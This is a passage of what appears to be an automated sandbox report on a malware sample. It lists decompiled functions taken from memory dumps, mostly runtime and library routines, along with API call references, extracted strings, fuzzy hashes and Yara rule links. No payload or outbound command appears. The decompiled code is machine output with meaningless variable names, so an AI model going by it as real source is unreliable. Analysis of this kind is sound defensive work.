								}
								goto L21;
							}
							L11:
							E1003319B(_t73,  *(_t93 - 0x158));
							goto L12;
						}
						__eflags = _t73;
						if(_t73 != 0) {
							_t73[8] = 3;
							E10002700( &(_t73[0x10]),  *(_t93 - 0x158));
						}
						goto L5;
					} else {
						E1000A618(_t77, _t90, 0x104,  *(_t93 - 0x158), 0xffffffff);
						E1003319B(_t73,  *(_t93 - 0x158));
						L5:
						L22:
						return E10041D97(_t73, _t90, _t92);
					}
				}
				L1:
				_t45 = E1000A5CD(_t73, _t75, _t90, _t91, _t99);
				goto L2;
			}

0x100331ca
0x100331ca
0x100331d4
0x100331d9
0x100331dc
0x100331df
0x100331e4
0x100331e6
0x100331e9
0x100331ef
0x100331f1
0x100331f8
0x100331fa
0x100331fc
0x10033201
0x00000000
0x00000000
0x10033203
0x1003320b
0x10033212
0x1003321a
0x10033241
0x10033243
0x10033266
0x1003326b
0x10033277
0x10033282
0x10033288
0x1003328a
0x1003334e
0x10033357
0x1003335e
0x00000000
0x1003335e
0x100332a9
0x100332af
0x100332b1
0x100332d2
0x100332d9
0x100332dc
0x100332dc
0x100332e2
0x100332e9
0x100332f8
0x100332fe
0x10033301
0x00000000
0x00000000
0x10033304
0x1003330a
0x10033311
0x00000000
0x00000000
0x10033313
0x10033319
0x00000000
0x00000000
0x10033322
0x1003332e
0x10033332
0x10033334
0x10033367
0x10033369
0x10033378
0x1003337f
0x1003337f
0x100332bf
0x100332c8
0x00000000
0x100332c8
0x1003333d
0x10033346
0x1003334b
0x00000000
0x100332e9
0x100332b3
0x100332ba
0x00000000
0x100332ba
0x10033245
0x10033247
0x10033252
0x10033259
0x10033259
0x00000000
0x1003321c
0x10033226
0x10033235
0x1003323a
0x1003335f
0x10033364
0x10033364
0x1003321a
0x100331f3
0x100331f3
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 100331D4
GetFullPathNameA.KERNEL32(00000000,00000104,100176E1,?,00000158,10033498,?,00000000,?,00000000,00000104,00000000,00000000,?,00000000), ref: 10033212

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

PathIsUNCA.SHLWAPI(?,100176E1,?,?,00000000), ref: 10033282
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 100332A9
CharUpperA.USER32(100176E1), ref: 100332DC
FindFirstFileA.KERNEL32(?,?), ref: 100332F8
FindClose.KERNEL32(00000000), ref: 10033304
lstrlenA.KERNEL32(00000000), ref: 10033322

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 781c6cef4da2801c6b82dede4edb9e6c9c132987aedf0143ad82c357e0cb9ecb
Instruction ID: c977f84bb4e60495120a47d45b8f3b15c483e91e8ff0dd958c910cf3845b01d7
Opcode Fuzzy Hash: 781c6cef4da2801c6b82dede4edb9e6c9c132987aedf0143ad82c357e0cb9ecb
Instruction Fuzzy Hash: 00417075900659DFEB16CF60CCC9BEE77B8EF45356F008198F809AA391DB349E848E10

Uniqueness

Uniqueness Score: -1.00%

Function 048C8C09, Relevance: 11.6, Strings: 9, Instructions: 322COMMON

Download Yara Rule

Strings

y&, xrefs: 048C8DFB
09, xrefs: 048C917C
4y&, xrefs: 048C8D84
$^;, xrefs: 048C8F21
z], xrefs: 048C8D3A
yM", xrefs: 048C8D1D
y&, xrefs: 048C8E12
O|L, xrefs: 048C8CC7
>@, xrefs: 048C9169

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $^;$09$4y&$>@$O|L$y&$y&$yM"$z]
API String ID: 0-2859082777
Opcode ID: 2d14cf84b782dcecb7c51025e4af028c6e09d2b2cc1bea44a2931810b087cc1b
Instruction ID: e21cc5d1063fd19d83f4ece1c67a52eeecab0d748ae0d2aac7bccf16f00fddb7
Opcode Fuzzy Hash: 2d14cf84b782dcecb7c51025e4af028c6e09d2b2cc1bea44a2931810b087cc1b
Instruction Fuzzy Hash: 40020F724083809FD3A9CF65C58AA8BFBE1BBC5758F108E0DE1D996260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048CFEA0, Relevance: 10.2, Strings: 8, Instructions: 250COMMON

Download Yara Rule

Strings

L, xrefs: 048CFF2E
%Y, xrefs: 048CFED0
X{, xrefs: 048CFFB9
vd;, xrefs: 048CFF5B
_g, xrefs: 048D00B4
JU, xrefs: 048D0097
BwO, xrefs: 048D0011
*s, xrefs: 048D00D4

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %Y$*s$BwO$JU$X{$vd;$_g$L
API String ID: 0-2451716437
Opcode ID: 4ec8a7f1b876845766086dc783de2de4ddf8d5e3e7b1e260ee07bf2109bd8da1
Instruction ID: c1641571bf09a6bd4ce5abd6c319c190795cd60eeaad91f5881bc4655495a53c
Opcode Fuzzy Hash: 4ec8a7f1b876845766086dc783de2de4ddf8d5e3e7b1e260ee07bf2109bd8da1
Instruction Fuzzy Hash: 98C11E72409381AFC7A8CF65C88991BFBF1FB85758F508A1DF2D686260D3B19949CF06

Uniqueness

Uniqueness Score: -1.00%

Function 048CC5FE, Relevance: 9.1, Strings: 7, Instructions: 374COMMON

Download Yara Rule

Strings

dk;, xrefs: 048CC6EE
`3", xrefs: 048CC732
kA^, xrefs: 048CCA71
^\], xrefs: 048CC662
hKp, xrefs: 048CC82F
x8H, xrefs: 048CC825
kA^, xrefs: 048CCAF9

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ^\]$`3"$dk;$hKp$kA^$kA^$x8H
API String ID: 0-1464862232
Opcode ID: b46338e17942a268c58f28fbc932fde4e4f4a3363c17450f90b4a1fc3b264bab
Instruction ID: 728b5a9e51436c7df8c54421b3dfa27b871f00396c2ea6737e6b8787a04bac7d
Opcode Fuzzy Hash: b46338e17942a268c58f28fbc932fde4e4f4a3363c17450f90b4a1fc3b264bab
Instruction Fuzzy Hash: 88022171D0021D9BDF28CFE5D98AAEEBBB1FB04314F208259D51ABA260D7B45A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100199B4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E100199B4(void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t36;
				signed int _t37;
				void* _t39;
				void* _t40;
				signed int _t45;
				void* _t46;

				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x11c;
				_t9 =  *0x1006d940; // 0xc2bf211
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E10003960(_t31, E10042A37(__edx,  &_v288, 4, "LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E1004223E(_t49));
					 *(E1004223E(_t49)) =  *_t16 & 0x00000000;
					_push( &_v288);
					_t30 = E1004235A( &_v284, 0x112, 0x111, _t39, _t28);
					_t20 = E1004223E(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E1004223E(__eflags)) = _t37;
					} else {
						E1000BDCF( *((intOrPtr*)(E1004223E(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryA( &_v284);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E1003F29E(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}

0x100199b4
0x100199b4
0x100199b7
0x100199b9
0x100199bf
0x100199c6
0x100199c9
0x100199d2
0x100199d4
0x100199dc
0x10019a04
0x10019a06
0x00000000
0x00000000
0x00000000
0x00000000
0x100199de
0x100199ec
0x100199f1
0x10019a08
0x10019a08
0x10019a0e
0x10019a15
0x10019a1e
0x10019a3b
0x10019a3d
0x10019a42
0x10019a45
0x10019a5b
0x10019a47
0x10019a4e
0x10019a53
0x10019a5d
0x10019a61
0x10019a76
0x10019a76
0x10019a76
0x10019a67
0x10019a6e
0x10019a6e
0x10019a61
0x10019a7b
0x10019a7e
0x10019a85

APIs

_strcpy_s.LIBCMT ref: 100199E6

Part of subcall function 1004223E: __getptd_noexit.LIBCMT ref: 1004223E

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100199FE
__snwprintf_s.LIBCMT ref: 10019A33
LoadLibraryA.KERNEL32(?), ref: 10019A6E

Strings

LOC, xrefs: 100199DE

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1155623865-519433814
Opcode ID: daf01efc0deb9536fc4afcdc6663db9a34d91321ab5b6d4bcc9dd4c1570c5f45
Instruction ID: 08ad1d8625425df2031f27f9b76297261e5533b6c615c647ca63baf17d7c9742
Opcode Fuzzy Hash: daf01efc0deb9536fc4afcdc6663db9a34d91321ab5b6d4bcc9dd4c1570c5f45
Instruction Fuzzy Hash: 3E21B775A00218BBDB24DB74CC46BDA37ACEF05350F9040A1FA05EB191DA74AD89C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 048D0ADE, Relevance: 8.1, Strings: 6, Instructions: 592COMMON

Download Yara Rule

Strings

H, xrefs: 048D126B
sWP, xrefs: 048D0F86
n, xrefs: 048D1049
<;, xrefs: 048D1219
s=E, xrefs: 048D0E55
Nw, xrefs: 048D1284

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: <;$Nw$s=E$sWP$H$n
API String ID: 0-3418553609
Opcode ID: 75ff79092c821003cc2f27b6f5cce7d5b0ecb3a38fad4c27adaa15058e94cbe1
Instruction ID: f92bb44062cd4ea75fb5922dafce3e3bb243c9668f0c28def8551ecb04c3bc84
Opcode Fuzzy Hash: 75ff79092c821003cc2f27b6f5cce7d5b0ecb3a38fad4c27adaa15058e94cbe1
Instruction Fuzzy Hash: AC6211715093808FE378CF29C589B8BBBE1BBC5318F108A1DE6D996260D7B19849CF53

Uniqueness

Uniqueness Score: -1.00%

Function 048CE21C, Relevance: 7.8, Strings: 6, Instructions: 316COMMON

Download Yara Rule

Strings

|t|o, xrefs: 048CE36A
vi, xrefs: 048CE342
GD, xrefs: 048CE311
QY, xrefs: 048CE551
}q, xrefs: 048CE5B0
?Hn, xrefs: 048CE41A

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ?Hn$GD$QY$vi$|t|o$}q
API String ID: 0-2058854943
Opcode ID: fbabbfc3f6a5b7a17b92f39c3b9a22045466033446d99a081cb2c4a8cb857beb
Instruction ID: b6902ff5ab4717dd4da20ffc23c5858218e2c476340ca382935316930a322979
Opcode Fuzzy Hash: fbabbfc3f6a5b7a17b92f39c3b9a22045466033446d99a081cb2c4a8cb857beb
Instruction Fuzzy Hash: 90E142B29083419FD768CF25C88995BBBF1BBD4718F008A1DF59596260E7B5E908CF83

Uniqueness

Uniqueness Score: -1.00%

Function 048CDAAE, Relevance: 7.8, Strings: 6, Instructions: 255COMMON

Download Yara Rule

Strings

4,uE, xrefs: 048CDD99
i;^, xrefs: 048CDB68
D, xrefs: 048CDF1F
Cf, xrefs: 048CDE49
H9, xrefs: 048CDD18
Z~, xrefs: 048CDCB3

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 4,uE$Cf$D$H9$i;^$Z~
API String ID: 0-3499028901
Opcode ID: 56a8f9e00ee3f01f1ff0f469d456afa72f56c9b94969e49f099d5db639979199
Instruction ID: 43722ef59c28de149d87f5b17972e4978f707591e7d9078176a015d1cbf2c200
Opcode Fuzzy Hash: 56a8f9e00ee3f01f1ff0f469d456afa72f56c9b94969e49f099d5db639979199
Instruction Fuzzy Hash: C4D10F725093809FD764CF66C589A5BFBE1BBC4758F108E1DF29A86260D3B58909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 048C9E22, Relevance: 7.6, Strings: 6, Instructions: 114COMMON

Download Yara Rule

Strings

e_, xrefs: 048C9F12
~6, xrefs: 048C9ECD
9, xrefs: 048C9F4E
Fhe , xrefs: 048C9F02
(, xrefs: 048C9F2E
$q0M, xrefs: 048C9EE5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $q0M$Fhe $~6$($9$e_
API String ID: 0-442829948
Opcode ID: fd7d9d957972b3215f9fa0363325562683e8781a161a9bbb6d046a62996a4821
Instruction ID: c320f47c4de50d1afa8a782caf949ff194d55dbf87fcd9f76b144f7bfa40780e
Opcode Fuzzy Hash: fd7d9d957972b3215f9fa0363325562683e8781a161a9bbb6d046a62996a4821
Instruction Fuzzy Hash: C55173B25093018BC758CF14D48541BBBE4FBD4358F504E1DF9AAA6260E3B5EA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1003F29E, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1003F29E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1006d940; // 0xc2bf211
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x100947b8 = _t6;
				 *0x100947b4 = _t22;
				 *0x100947b0 = _t25;
				 *0x100947ac = _t21;
				 *0x100947a8 = _t27;
				 *0x100947a4 = _t26;
				 *0x100947d0 = ss;
				 *0x100947c4 = cs;
				 *0x100947a0 = ds;
				 *0x1009479c = es;
				 *0x10094798 = fs;
				 *0x10094794 = gs;
				asm("pushfd");
				_pop( *0x100947c8);
				 *0x100947bc =  *_t31;
				 *0x100947c0 = _v0;
				 *0x100947cc =  &_a4;
				 *0x10094708 = 0x10001;
				_t11 =  *0x100947c0; // 0x0
				 *0x100946bc = _t11;
				 *0x100946b0 = 0xc0000409;
				 *0x100946b4 = 1;
				_t12 =  *0x1006d940; // 0xc2bf211
				_v812 = _t12;
				_t13 =  *0x1006d944; // 0xf3d40dee
				_v808 = _t13;
				 *0x10094700 = IsDebuggerPresent();
				_push(1);
				E1004C24D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1005db64);
				if( *0x10094700 == 0) {
					_push(1);
					E1004C24D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x1003f29e
0x1003f29e
0x1003f29e
0x1003f29e
0x1003f29e
0x1003f29e
0x1003f29e
0x1003f2a4
0x1003f2a6
0x1003f2a6
0x10043f52
0x10043f57
0x10043f5d
0x10043f63
0x10043f69
0x10043f6f
0x10043f75
0x10043f7c
0x10043f83
0x10043f8a
0x10043f91
0x10043f98
0x10043f9f
0x10043fa0
0x10043fa9
0x10043fb1
0x10043fb9
0x10043fc4
0x10043fce
0x10043fd3
0x10043fd8
0x10043fe2
0x10043fec
0x10043ff1
0x10043ff7
0x10043ffc
0x10044008
0x1004400d
0x1004400f
0x10044017
0x10044022
0x1004402f
0x10044031
0x10044033
0x10044038
0x1004404c

APIs

IsDebuggerPresent.KERNEL32 ref: 10044002
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10044017
UnhandledExceptionFilter.KERNEL32(1005DB64), ref: 10044022
GetCurrentProcess.KERNEL32(C0000409), ref: 1004403E
TerminateProcess.KERNEL32(00000000), ref: 10044045

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 552ef50573f78c898b0f13c9c07c6eed1fd91f31fcb7c4ca5a31c08dddada28d
Instruction ID: 9561bedc9d55b86e94345884632acafc7f567721d217052304c27c82bc557ecc
Opcode Fuzzy Hash: 552ef50573f78c898b0f13c9c07c6eed1fd91f31fcb7c4ca5a31c08dddada28d
Instruction Fuzzy Hash: 4A21EDB8809368DFE348DFA5EDC4A48BBE0FB1A315F12511BE50C87361EBB058808F09

Uniqueness

Uniqueness Score: -1.00%

Function 048CA3DF, Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

aj`, xrefs: 048CAAD1
,,d, xrefs: 048CA6AD
aj`, xrefs: 048CA961
:b-, xrefs: 048CA6CA
%VwK, xrefs: 048CA9C2

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: %VwK$,,d$:b-$aj`$aj`
API String ID: 1889721586-266388962
Opcode ID: 1641224f708f2053433a14e15e2a2cb126fba8e88384aa48872b548de2a2aa29
Instruction ID: e61e291c40b78e7d6e0c5a6e6ef91434e31f375a524fd83f9270f2a6e550ae3f
Opcode Fuzzy Hash: 1641224f708f2053433a14e15e2a2cb126fba8e88384aa48872b548de2a2aa29
Instruction Fuzzy Hash: 640230715093819FD3A8DF65C589A9BBBF1FBC1758F108E1CE29A86220D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048E1343, Relevance: 6.5, Strings: 5, Instructions: 276COMMON

Download Yara Rule

Strings

$F, xrefs: 048E16C1
0{, xrefs: 048E16A7
$, xrefs: 048E13D6
Wv, xrefs: 048E1865
$8 i, xrefs: 048E15BA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $$$8 i$$F$Wv$0{
API String ID: 0-2166306512
Opcode ID: bcdb27e2780c89e597f1b70701c5d10c0e152b2332d47d1ffc764df5b74e9897
Instruction ID: d238e2c422016b79f1eaaf8317eeb9cc4f4a334c045795a1f63180c49de59c65
Opcode Fuzzy Hash: bcdb27e2780c89e597f1b70701c5d10c0e152b2332d47d1ffc764df5b74e9897
Instruction Fuzzy Hash: DAD111725083809FD768CF65C589A5BFBF1FB85758F108A1CF2AA86260D7B59909CF03

Uniqueness

Uniqueness Score: -1.00%

Function 048DF14D, Relevance: 6.5, Strings: 5, Instructions: 248COMMON

Download Yara Rule

Strings

4z], xrefs: 048DF34F
@L, xrefs: 048DF2CC
J`m, xrefs: 048DF21C
sc, xrefs: 048DF2AF
eI, xrefs: 048DF3C1

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 4z]$J`m$eI$sc$@L
API String ID: 0-10485883
Opcode ID: 60750a9d14e672d9feaac8f28b576af08c7acbda9ec3aba8021479b5a6f3599f
Instruction ID: 176e1611d0d0fa7012d84cf1a924235e1b566bb507742bc70621abe49a6137ab
Opcode Fuzzy Hash: 60750a9d14e672d9feaac8f28b576af08c7acbda9ec3aba8021479b5a6f3599f
Instruction Fuzzy Hash: 9BC13E711093819FC368DF25C58941BBBF2FB85348F508A1EF6A686260D3B9E949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 048C4F8E, Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

p9<, xrefs: 048C5017
F], xrefs: 048C5116
T@, xrefs: 048C50DD
=od, xrefs: 048C514C
7], xrefs: 048C519D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 7]$=od$F]$T@$p9<
API String ID: 0-1412243312
Opcode ID: a17b4534a1e4ca9eae53d50490f58453fea6df02481c6452e6b700d86e525008
Instruction ID: 4bf5f745aae817a66ab33dd11cfb83e539c59ac7546500c361a69d5c70efb977
Opcode Fuzzy Hash: a17b4534a1e4ca9eae53d50490f58453fea6df02481c6452e6b700d86e525008
Instruction Fuzzy Hash: 8BB14072508341AFD368CF25D98A90BBBF1BBC5748F508A0DF19A86260D3B5D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048CCC8D, Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

*, xrefs: 048CCE1B
LZ\9, xrefs: 048CCED0
oQAa, xrefs: 048CCE6B
V), xrefs: 048CCDA4
<yG0, xrefs: 048CCD59

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: *$<yG0$LZ\9$V)$oQAa
API String ID: 0-2624737150
Opcode ID: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction ID: 350770d1983ac641288fb6aeb9570f9ff0ea2ed0922f9f5e4fe911a9b89ae9a7
Opcode Fuzzy Hash: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction Fuzzy Hash: CAA11F711083419BD7A8DF65998991BBBF1FBC4748F004E1CF68686260D7B1DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 048D1C10, Relevance: 6.4, Strings: 5, Instructions: 173COMMON

Download Yara Rule

Strings

V;, xrefs: 048D1DFB
q"}, xrefs: 048D1E42
u}s, xrefs: 048D1D74
En, xrefs: 048D1DE0
i"y, xrefs: 048D1D8C

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: En$i"y$q"}$u}s$V;
API String ID: 0-780694712
Opcode ID: dc472c5784948e029237ca124323ff9a56c57b552673f1c951ce619bddb6a9e1
Instruction ID: a1f5aa4211ac0404834aaaff6beab38acbb72489ed0965110f0f4d5d076c5e6f
Opcode Fuzzy Hash: dc472c5784948e029237ca124323ff9a56c57b552673f1c951ce619bddb6a9e1
Instruction Fuzzy Hash: 28812F7180A3419FC358DF25D58A40BFBE1BB88748F405E2DF996A6220C7B1DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 048C55E8, Relevance: 6.4, Strings: 5, Instructions: 168COMMON

Download Yara Rule

Strings

,a, xrefs: 048C5771
}, xrefs: 048C5605
ng, xrefs: 048C5724
\RN, xrefs: 048C57AE
6", xrefs: 048C55EE

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ,a$6"$\RN$ng$}
API String ID: 0-2188652094
Opcode ID: c88f069f3f14df435526a903275e06abb3bae228242b8b3ec83e53fc4b4b4a63
Instruction ID: 38738508a11a750075e903548a4b033f56bcf851e6452cd79fab6519e2f7adfe
Opcode Fuzzy Hash: c88f069f3f14df435526a903275e06abb3bae228242b8b3ec83e53fc4b4b4a63
Instruction Fuzzy Hash: 92814F711083419FC398DF65C58A81BFBE1FBC4758F508A1DF29696260D3B5EA4ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 048E1A3C, Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

78, xrefs: 048E21C8
'>, xrefs: 048E1B3C
q^>, xrefs: 048E1AD0
